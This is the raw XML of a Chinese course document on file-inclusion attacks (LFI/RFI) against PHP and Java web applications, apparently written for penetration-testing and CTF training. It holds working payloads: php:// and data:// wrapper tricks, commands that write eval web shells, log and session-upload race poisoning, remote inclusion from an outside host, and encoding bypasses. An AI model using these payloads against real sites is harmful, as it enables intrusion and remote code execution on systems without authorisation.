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580" w14:textId="77777777" w:rsidR="006F0B2A" w:rsidRDefault="006F0B2A" w:rsidP="006F0B2A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Web攻防-文件包含&amp;LFI&amp;RFI&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>伪协议</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条件&amp;编码算法&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>无文件</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>利用&amp;JAVA应用&amp;SRC复盘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E7A2EF" w14:textId="6270593D" w:rsidR="006F0B2A" w:rsidRDefault="006F0B2A" w:rsidP="006F0B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9ED7D29" wp14:editId="18CF43FF">
            <wp:extent cx="5270500" cy="16465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6F3" w14:textId="77777777" w:rsidR="006F0B2A" w:rsidRDefault="006F0B2A" w:rsidP="006F0B2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读写带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阶使用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77459FDF" w14:textId="04877742" w:rsidR="006F0B2A" w:rsidRDefault="006F0B2A" w:rsidP="006F0B2A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6E76304" wp14:editId="073482B8">
            <wp:extent cx="5270500" cy="58502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25AC" w14:textId="618BA2E9" w:rsidR="006F0B2A" w:rsidRDefault="006F0B2A" w:rsidP="006F0B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5CE511D" wp14:editId="181B11EE">
            <wp:extent cx="5274310" cy="6315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1479" w14:textId="5DFE7DAE" w:rsidR="006F0B2A" w:rsidRDefault="006F0B2A" w:rsidP="006F0B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70ABC5F" wp14:editId="7AF682A2">
            <wp:extent cx="5274310" cy="194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2965" w14:textId="77777777" w:rsidR="006F0B2A" w:rsidRDefault="006F0B2A" w:rsidP="006F0B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D47CD73" w14:textId="77777777" w:rsidR="006F0B2A" w:rsidRDefault="006F0B2A" w:rsidP="006F0B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WEB攻防-文件上传-安全验证&amp;层面逻辑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A192BD" w14:textId="77777777" w:rsidR="006F0B2A" w:rsidRDefault="006F0B2A" w:rsidP="006F0B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WEB攻防-文件上传-执行权限&amp;解码还原</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F872DF6" w14:textId="77777777" w:rsidR="006F0B2A" w:rsidRDefault="006F0B2A" w:rsidP="006F0B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WEB攻防-文件上传-分站存储&amp;OSS存储</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFAECEA" w14:textId="77777777" w:rsidR="006F0B2A" w:rsidRDefault="006F0B2A" w:rsidP="006F0B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WEB攻防-文件上传-JS提取&amp;源码类&amp;编辑器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685FAFD6" w14:textId="77777777" w:rsidR="006F0B2A" w:rsidRDefault="006F0B2A" w:rsidP="006F0B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WEB攻防-文件包含-LFI&amp;RFI&amp;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伪协议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&amp;无文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E994FC" w14:textId="77777777" w:rsidR="006F0B2A" w:rsidRDefault="006F0B2A" w:rsidP="006F0B2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WEB攻防-文件包含-PHP&amp;JAVA&amp;SRC复盘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51056522" w14:textId="77777777" w:rsidR="006F0B2A" w:rsidRDefault="006F0B2A" w:rsidP="006F0B2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、原理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程序开发人员通常会把可重复使用的函数写到单个文件中，在使用某些函数时，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直接调用此文件，而无须再次编写，这种调用文件的过程一般被称为文件包含。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在包含文件的过程中，如果文件能进行控制，则存储文件包含漏洞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本地包含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-Local File Include-LFI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远程包含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-Remote File Include-RFI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差异原因：代码过滤和环境配置文件开关决定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白盒审计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白盒发现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、可通过应用功能追踪代码定位审计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、可通过脚本特定函数搜索定位审计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玩法绕过相关修复等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include_once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require_once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在包含的过程中如果出现错误，会抛出一个警告，程序继续正常运行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函数出现错误的时候，会直接报错并退出程序的执行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java.io.File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java.io.FileReader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ASP.NET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System.IO.FileStream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System.IO.StreamReader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、黑盒分析：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黑盒发现：主要观察参数传递的数据和文件名是否对应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archive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、语言文件等相关字眼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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="708090"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>本地利用</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="708090"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>思路：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、配合文件上传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包含日志（知道路径，默认路径测试）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（知道路径，默认路径测试）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无文件支持伪协议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https://blog.csdn.net/unexpectedthing/article/details/121276653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file:///etc/passwd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php://filter/read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convert.base64-encode/resource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phpinfo.php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文件写入：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php://filter/write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convert.base64-encode/resource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phpinfo.php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php://input POST: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 fputs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fopen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'shell.php'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'w'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'&lt;?php @eval($_GET[cmd]); ?&gt;'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php://input POST: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 phpinfo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data://text/plain,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 phpinfo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data://text/plain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base64,PD9waHAgcGhwaW5mbygpOz8%2b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远程利用思路：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直接搭建一个可访问的远程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#CTF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方向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https://ctf.show/challenges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payload:?file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php://filter/read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convert.base64-encode/resource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payload: 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php://input post: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 system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'tac flag.php'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payload: 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http://www.xiaodi8.com/1.txt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.txt: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 system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'tac flag.php'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payload: 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data://text/plain,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'tac flag.*'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payload:?file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data://text/plain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base64,PD9waHAgc3lzdGVtKCd0YWMgZmxhZy5waHAnKTs/Pg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==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payload: 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http://www.xiaodi8.com/1.txt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.txt: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 system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'tac flag.php'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日志包含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、利用其他协议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file,zlib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、利用日志记录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特性包含执行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分析需文件名及带有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关键字放弃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故利用日志记录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带入代码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/var/log/nginx/access.log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-86-SESSION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PHP_SESSION_UPLOAD_PROGRESS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进行文件包含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名字，条件竞争访问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session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文件，触发创建新文件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&lt;!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DOCTYPE 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lastRenderedPageBreak/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form action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"http://xxxx.ctf.show/"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method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"POST"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"multipart/form-data"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input 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"hidden"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"PHP_SESSION_UPLOAD_PROGRESS"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value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"&lt;?php fputs(fopen('shell.php','w'),'&lt;?php @eval($_POST[1])?&gt;'?&gt;"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/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input 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"file"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/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input type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"submit"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value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"submit"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/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/form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/body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https://www.cnblogs.com/lnterpreter/p/14086164.html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https://www.cnblogs.com/echoDetected/p/13976405.html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-php://filter/write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加密编码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php://filter/write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convert.base64-decode/resource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.php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aaPD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg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==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、利用凯撒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php://filter/write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string.rot13/resource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?cuc riny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$_CBFG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，各种符号，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代码编码写出无符号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data://text/plain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base64,PD9waHAgc3lzdGVtKCd0YWMgKi5waHAnKTtlY2hvIDEyMzs/PmFk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117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-php://filter/write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新的算法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convert.iconv.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：一种过滤器，和使用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iconv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函数处理流数据有等同作用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?php</w:t>
      </w:r>
      <w:r>
        <w:br/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$result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iconv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"UCS-2LE"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"UCS-2BE"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'&lt;?php eval($_POST[a]);?&gt;'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经过一次反转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:".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$result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."\n"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echo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经过第二次反转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:"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.iconv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"UCS-2LE"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"UCS-2BE"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$result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php://filter/write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convert.iconv.UCS-2LE.UCS-2BE/resource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hp pvela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$(P_SO[T]a;)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实战方向：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复盘报告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https://mp.weixin.qq.com/s/hMUDDgRSPY6ybznYBRZ20Q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http://testphp.vulnweb.com/showimage.php?file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index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57059E2B" w14:textId="77777777" w:rsidR="006F0B2A" w:rsidRDefault="006F0B2A" w:rsidP="006F0B2A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0D91C924" w14:textId="77777777" w:rsidR="006F0B2A" w:rsidRDefault="006F0B2A" w:rsidP="006F0B2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7162EA98" w14:textId="77777777" w:rsidR="000F6218" w:rsidRPr="006F0B2A" w:rsidRDefault="000F6218"/>
    <w:sectPr w:rsidR="000F6218" w:rsidRPr="006F0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E90"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="40EE5A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B7"/>
    <w:rsid w:val="000F6218"/>
    <w:rsid w:val="006F0B2A"/>
    <w:rsid w:val="00C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A1AA1-E796-4B86-9345-3629C427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F0B2A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0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B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0B2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F0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2025-05-23T05:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-23T05:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>